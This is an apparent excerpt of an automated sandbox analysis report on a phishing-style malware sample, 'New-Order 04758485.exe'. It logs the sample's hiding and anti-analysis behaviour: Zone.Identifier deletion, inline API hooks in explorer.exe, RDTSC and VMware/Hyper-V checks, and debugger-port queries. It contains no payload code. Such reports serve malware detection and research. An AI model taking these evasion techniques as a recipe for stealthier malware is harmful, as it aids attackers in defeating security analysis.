          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7D085 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7C875 push ss; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_00C7C811 push ss; retf

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\New-Order 04758485.exeFile opened: C:\Users\user\Desktop\New-Order 04758485.exe\:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE8
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\New-Order 04758485.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\New-Order 04758485.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000C698E4 second address: 0000000000C698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000C69B5E second address: 0000000000C69B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\New-Order 04758485.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\New-Order 04758485.exeWindow / User API: threadDelayed 3784
          Source: C:\Users\user\Desktop\New-Order 04758485.exeWindow / User API: threadDelayed 5936
          Source: C:\Users\user\Desktop\New-Order 04758485.exe TID: 4972Thread sleep time: -22136092888451448s >= -30000s
          Source: C:\Users\user\Desktop\New-Order 04758485.exe TID: 4196Thread sleep count: 3784 > 30
          Source: C:\Users\user\Desktop\New-Order 04758485.exe TID: 4196Thread sleep count: 5936 > 30
          Source: C:\Users\user\Desktop\New-Order 04758485.exe TID: 4972Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\New-Order 04758485.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\New-Order 04758485.exeThread delayed: delay time: 30000
          Source: explorer.exe, 0000000B.00000000.327874699.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.327874699.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: New-Order 04758485.exe, 00000000.00000002.302589665.0000000000EF1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltem.
          Source: explorer.exe, 0000000B.00000000.327737831.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.327424553.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000B.00000002.486695959.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 0000000B.00000000.327874699.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 0000000B.00000000.327874699.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000B.00000000.327946204.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 0000000B.00000002.486736347.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 0000000B.00000000.327424553.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000B.00000000.327424553.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000B.00000002.486695959.00000000055D0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 0000000B.00000000.327424553.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\New-Order 04758485.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\New-Order 04758485.exeCode function: 10_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DCFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DCFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04DAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04D140E1 mov eax, dword ptr fs:[00000030h]
